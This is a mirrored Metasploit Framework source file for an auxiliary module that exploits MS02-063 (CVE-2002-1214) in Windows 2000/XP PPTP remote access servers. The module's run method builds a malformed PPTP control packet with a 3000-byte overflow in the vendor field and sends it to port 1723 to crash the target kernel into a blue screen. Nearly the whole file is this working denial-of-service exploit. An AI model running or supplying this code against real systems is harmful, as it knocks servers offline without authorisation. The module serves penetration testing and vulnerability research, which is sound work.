Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb
19515 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Tcp
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'MS02-063 PPTP Malformed Control Data Kernel Denial of Service',
15
'Description' => %q{
16
This module exploits a kernel based overflow when sending abnormal PPTP Control Data
17
packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers
18
(Remote Access Services). Kernel memory is overwritten resulting in a BSOD.
19
Code execution may be possible however this module is only a DoS.
20
},
21
'Author' => [ 'aushack' ],
22
'License' => MSF_LICENSE,
23
'References' => [
24
[ 'BID', '5807' ],
25
[ 'CVE', '2002-1214' ],
26
[ 'OSVDB', '13422' ],
27
[ 'MSB', 'MS02-063' ],
28
],
29
'DisclosureDate' => '2002-09-26',
30
'Notes' => {
31
'Stability' => [CRASH_OS_DOWN],
32
'SideEffects' => [],
33
'Reliability' => []
34
}
35
)
36
)
37
38
register_options(
39
[
40
Opt::RPORT(1723),
41
]
42
)
43
end
44
45
def run
46
connect
47
48
# Fields borrowed from Wireshark :)
49
sploit = "\x00\x9c" # length
50
sploit << "\x00\x01" # control message
51
sploit << "\x1a\x2b\x3c\x4d" # cookie
52
sploit << "\x00\x01" # start control connection req
53
sploit << "\x00\x00" # reserved
54
sploit << "\x01\x00" # protocol version
55
sploit << "\x00\x00" # reserved
56
sploit << "\x00\x03" # framing capabilities
57
sploit << "\x00\x00\x00\x02" # bearer capabilities
58
sploit << "\xff\xff" # max channels
59
sploit << "\x0a\x28" # firmware revision
60
sploit << "\x00\x01" # Hostname
61
sploit << 'A' * 3000 # Vendor - trigger vuln
62
63
print_status('Sending PPTP DoS Packet...')
64
65
sock.put(sploit)
66
67
print_status('Packet sent. Kernel should halt on a Stop Error (BSOD).')
68
69
disconnect
70
end
71
end
72
73